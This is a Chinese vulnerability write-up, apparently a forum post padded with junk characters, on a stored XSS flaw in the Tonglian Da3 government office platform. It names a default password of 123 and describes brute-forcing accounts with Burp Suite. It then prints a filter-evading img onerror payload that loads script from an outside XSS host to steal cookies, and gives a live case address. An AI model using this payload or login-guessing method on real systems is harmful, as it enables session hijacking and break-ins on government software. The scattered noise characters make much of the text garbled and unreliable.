2 j+ r2 {# B& i" \; d( {9 d
: K: i3 Q& \7 j+ z 同联Da3协同办公平台后台通用储存型xss漏洞
/ Y y V) \* a. C
8 V4 ]& R0 L t/ \2 _, a* f
8 ^( i/ o/ g0 ?4 [ 平台简介:4 x. g8 t+ s- z* e4 E1 t
1 B. K9 [" z5 t. J# i+ }! O' a - z: M2 K$ h, N& w, Y: Z* E# i% g/ _
" i9 o2 \2 j/ T4 @9 I
! V' Q4 N# z$ X! r& _- z
6 |# p% t! h+ [, e5 ]* U2 d( N
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
* b9 z( A9 ?! S- s# e同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 r& {' r% [: B! u: T3 e" E) d同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
. c3 B- B2 `" [. x, V
" p& l) F; b; ~- x& F6 `8 i; h " ?2 {8 J5 w9 S! m/ M" T: R
6 B0 D: F! x; R: P1 c
' g. [; E. j. H5 I% I + Q+ U5 B9 p0 j% F
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
1 ? P9 f- G$ P* \1 Z
- }6 z1 b& U) f3 d: H
! q& L6 f9 j: }: @/ v8 Q
* z2 M1 U% m/ O- Q
; U$ H: r8 i! K$ j
% _# y2 {9 x) v: L1 O# H http://1.1.1.1:7197/cap-aco/#(案例2-)# F% M# {, h, B: P8 Y
6 L- }% l. d4 |" o4 f
7 i" [" T, x @/ }7 [1 V
http://www.XXOO.com (案例1-官网网站)
4 b" d5 Q% Y5 p8 v5 n. U
' V9 O& `/ b: k' q) d- P0 Z
5 F6 M9 P e( }) w P 漏洞详情:" r! F1 U6 v5 P# H% A3 U0 Q7 C
* A) G( w# [4 K& X& x: v% P d+ p) s( w# h8 d" }& w8 @
案例一、' v% `: J! @2 E# ^2 r
3 |* v( D. O7 @+ K" ]& I8 @ 0 \5 ]7 c& m1 A i
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试5 J2 |8 l# ^/ e! G, {( R
7 Y# \0 v$ k. Y 9 J- [, W: s7 H$ l: T( z5 R
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:7 h' ` Q& a; X% U5 W( ~5 Y w7 [
6 d/ D, x) J% H- R9 O
# I% u- r2 T' x
4 }& z/ }% D) C1 y5 q
' J$ {) X. j) e3 {/ g' C
3 V/ y! |8 I4 c! @, B0 n' F4 e 
* m4 y9 t7 m% T# G; m2 L( Y
- B% G- w: Y0 j. e3 I$ i$ {, u
5 k5 g/ C. P; C7 q5 q/ E! Y status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ( Q; @/ V1 |# u+ d
: S, e- u; B, C) O0 d
4 [1 }; l0 Q H( {2 U$ B0 F % w6 c. c- ~. W) Z) x' J
3 [" c5 M9 E) x# Z
3 l+ ~% f" B3 n8 h2 f# _# k 
/ n5 c, h% }. a, A- V5 b/ S! d
! b+ \! b; b* o1 [6 Q* C ( `' s2 O$ [1 e% L1 k/ }
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 8 d0 g5 M& L) Y2 k8 U" Z
. b8 g8 }% {+ y( j$ A4 g! s . u" X! J. D( }
' c5 G+ k/ W$ j
* u$ ~8 j6 U- [* k/ b6 n- D
- K8 O& S8 w3 r6 m' }: ~0 f <img src=x
1 I' s! X$ J$ Jonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
! b: M- U" v& k- u* Y' f! E8 H
9 N% @. q4 ?4 S1 u3 u3 W z
L7 e9 c2 w( y' q4 J% a 
. ?/ ]7 f) e- q4 _
$ m' X: ]" W1 x N7 p' B% K
, K& I U& ~$ e3 D
然后发送,接收cookie如图:
& C6 t: g; M- h7 p
5 P8 j( {9 ?$ i2 E6 [
' @. e) N; L. `
; w, y' |# E* g
: E9 W+ w5 ~* C7 n0 P O
8 A5 U" f Z* n4 a : D( h7 z0 c# p! G0 @; Z4 m* `( t
7 W% R- @( H' E' m% E; d, L4 J
- K5 K1 Q1 D- @ g & Q$ ^& q7 K) l
5 s1 L# R; g5 i# Z+ O. |1 ^
/ I) W$ y/ M, w7 {8 p' z9 p
0 U0 V$ g" ?* e) o# |& ~( X/ J
2 k1 s) ^, D& `* f! t7 z, T 9 c9 M; } U/ R; V' L I
3 G( b6 N6 A x/ K9 C
. Q! e5 m. f: l$ O
8 k! K" M, ]+ _! p 
9 k8 F4 t- F1 ~1 y
' l2 [. t& Y2 G
5 l1 L3 h! k' Q5 L0 W" n ' r- S0 |5 ]! z2 W% Z4 Y
# R" e; g# G. X2 j- r: S & H% z8 H3 z2 W" f# f/ D, R, V
案例2、 3 V: S1 h2 ?( Z1 y p5 d
- m7 i+ C' f9 |( {: W9 h
1 ?4 u/ k- k- t/ u) V 前面步骤都一样,下面看效果图:
2 L" ~! ^/ V% u! j
* K& }/ q3 P, }
) x. f" b' ?! C; A, E
2 `8 B: M1 B" v. ? }( \; C
& P" k* f$ \2 V" E B; D$ R 1 l7 n: X4 D1 x$ E9 f0 S6 ~ u
: T) E3 L- s3 H% I. e, s* f' D
" ?+ ?+ U3 _ [2 {0 I: H; w# V5 k+ u
. Y* I' z: \& M- w& Z3 G ! b' `2 |+ N: Y7 N) | l* t) \& Z* F
( T2 ]# X8 E4 B% E2 u % s* I J, x+ T! |" K' w
# S4 H8 j3 l0 {9 V) w
! p4 r# @2 o, J6 w
% O2 k7 i* J4 F; e4 D
. b) N# x8 k; W: O" d! E8 F
" T9 \ f- E" P" {. R
, ~5 n2 `- `$ z2 u
$ R# X c+ k0 B& D1 b/ H) K- L) r
; K: I# a9 H; a0 `5 O$ L
6 l* k# v5 U- C" R5 V5 X
& {3 O, f4 [7 g7 F( r+ ?, K5 }
N- }$ ?! O. @5 d: _! R# T; _ 4 G1 _ [& E$ ?4 ~/ ?
1 z4 p+ p, i2 I( e
8 O2 M n# a8 m# m. U; p5 r1 n( a# A
5 Y- a- l" e- m5 X( i( x% Q
" H, l3 @. D3 f; }+ j u6 S, E% T, W
" f8 w. ~& |& y( J, v